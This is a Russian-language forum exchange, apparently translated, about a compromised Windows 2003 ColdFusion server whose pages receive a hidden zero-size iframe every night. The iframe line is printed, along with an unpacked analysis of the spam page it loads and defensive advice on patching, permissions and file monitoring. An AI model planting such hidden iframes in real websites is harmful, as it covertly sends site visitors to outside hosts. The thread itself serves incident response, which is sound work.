что-то, похоже, либо взломало веб-сервер, либо у нас работает какой-то полувредоносный код, который продолжает внедрять код на наш веб-сайт. похоже, это влияет только на пару файлов coldfusion и html. мы запустили Malwarebytes, Spybot и антивирус AVG и удалили все найденные записи, хотя их было немного. Я нахожусь в процессе исследования и установки некоторого программного обеспечения для обнаружения вторжений (например, Snort или OSSEC), чтобы посмотреть, поможет ли это найти виновника, но мне было интересно, видел ли кто-нибудь что-либо подобное или знал, где может быть вредоносный код прячется.
похоже, вводится следующий код:
<iframe scrolling="no" frameborder="0" src="http://www.collegefun4u.com/" width="0" height="0"></iframe>
в пару файлов каждую ночь в совершенно случайное время.
Это на сервере Windows 2003, на котором работает Coldfusion MX7. При изменении этих файлов в программе просмотра журналов / событий ничего не отображается.
Первое, что нужно сделать, это сразу проверить, что collegefun4u это все о.
Безопасный запрос сайта и распаковка JS-кода за ним, мы получили:
www.collegefun4u.com/ benign
[nothing detected] www.collegefun4u.com/
status: (referer=http:/twitter.com/trends/) saved 1205 bytes 3667a08e039642842c11744f464163baa186e4da
info: [decodingLevel=0] found JavaScript
error: undefined variable s
info: [1] no JavaScript
file: 3667a08e039642842c11744f464163baa186e4da: 1205 bytes
file: f9e4048e7e87436e12343dbcd9d467a31f0c972e: 93 bytes
Decoded Files
3667/a08e039642842c11744f464163baa186e4da from www.collegefun4u.com/ (1205 bytes, 17 hidden)
<html>
<head>
<title>Top 3 Webhosting</title>
<meta content="text/html; charset=iso-8859-1" http-equiv='Content-Type'>
<body>
<script> </script>
<table border='0' cellspacing='0' cellpadding='0' width='960' height="100%">
<tbody>
<tr>
<td>
<a target="_self" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574678674&toolid=10001&campid=5335950793&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg">Shopping In Ebay For The Cheapest</a>
</td>
<td>
<a href="http://stats.justhost.com/track?c998ec72c307330822d1608c2d6651a1f">JustHost</a>
</td>
<td>
<a href="http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=hydmedia-">Hostgator</a>
</td>
</tr>
</tbody>
</table>
</body>
<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-33569939-1']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script>
</html>
f9e4/048e7e87436e12343dbcd9d467a31f0c972e from www.collegefun4u.com/ (93 bytes)
//jsunpack.called CreateElement script //jsunpack.url http://www.google-analytics.com/ga.js
Обратите внимание, что я украсил HTML для облегчения чтения.
Как видите, он, по крайней мере, не пытается каким-либо образом навредить вашим пользователям, а просто вставляет некоторый спам от веб-хостинга (как видно из заголовка), три ссылки в таблице, которые охватывают весь ваш экран. Также следует отметить, что они анализируют ваш трафик через Google Analytics.
Посмотрев дальше в Интернете, я нашел аналогичная причина у которого такая же проблема, как и у вас. Запрос к его странице позже загружается в collegefun4u сайт. URL-запрос довольно умен и говорит нам об этом обнаружен набор эксплойтов BlackHole HTTP-запрос GET.
Именно в наши дни все большую известность получает набор эксплойтов BlackHole для настройки файлов на серверах. Они просто используют эксплойты нулевого дня в различных типах серверного программного обеспечения, чтобы иметь возможность настраивать файлы для рассылки спама или заражения многих клиентов.
Суть истории здесь состоит из трех частей:
Отслеживайте версии своего сервера и его программного обеспечения и убедитесь, что все это обновление, оно переходит от Apache / IIS к Plesk, к вашей структуре, к PHPMyAdmin и далее.
Убедитесь, что вы настроили все, что связано с Интернетом, чтобы не было возможности записи на ваш диск. В основном это означает правильную настройку разрешений для Plesk / PHP / файлов.
Если это продолжает происходить, убедитесь, что вы регистрируете доступ к файлу, чтобы знать, какой процесс это делает. В Windows у вас есть Монитор процесса для этого установите фильтр на .html и / или .js файлы, чтобы вы не заполняли файл подкачки всеми доступами. Это может вас узнать больше ...